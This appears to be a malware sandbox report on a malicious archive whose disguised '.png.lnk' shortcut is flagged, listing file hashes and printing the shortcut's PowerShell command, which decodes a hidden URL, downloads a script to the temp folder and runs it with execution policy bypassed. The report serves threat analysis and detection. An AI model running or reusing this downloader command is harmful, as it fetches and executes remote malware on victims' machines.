Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
acb0d03cbac0f188fe4eb35131078c12
Sha1
5ff587c228b64d1ad6c888d1b92d344e21cda658
Sha256
05bf99b8d1817cdc9450ce7128a0df9497f1475d1d0db21e7f528f83598c66de
Sha384
a47f6731a0df98497348105f4b30b30568a7fd5d7af61752e433cd787c8953f0046a25fd994d569df9f4d4dea3988991
Sha512
3679d6e692cc66f9b2fa16b3610f5f86487dea15c6db97f7cb4e55bc24e28897af7010a63b66fb6c0d9e2f9d8288ea7bef46640becd863a0cbdf1a2cb28171b4
SSDeep
48:9Z48z4a31KCmxxQdNiPN8QGl4eES8EgKeSzD4V:7z0pF8QoLvdza
TLSH
4331EAA6F0039323F84F553910974E8CE95B937063DE81DBB76FC8155C505A91620360
File Structure
acb0d03cbac0f188fe4eb35131078c12
Malicious
MP-710722697.mp4
IMG-257980788.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$q=[bigint]\"30240753708462917661591148017709855738925\";$n=[bigint]\"18961370645798618168729677157954222124382\";$c=$q -bxor $n;while($c -ne 0){$d+=[char]([int]($c -band 0xFF));$c=$c -shr 8};iwr $d -OutFile $env:TEMP\XWZ50oM.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\XWZ50oM.ps1"
acb0d03cbac0f188fe4eb35131078c12 (1.68 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙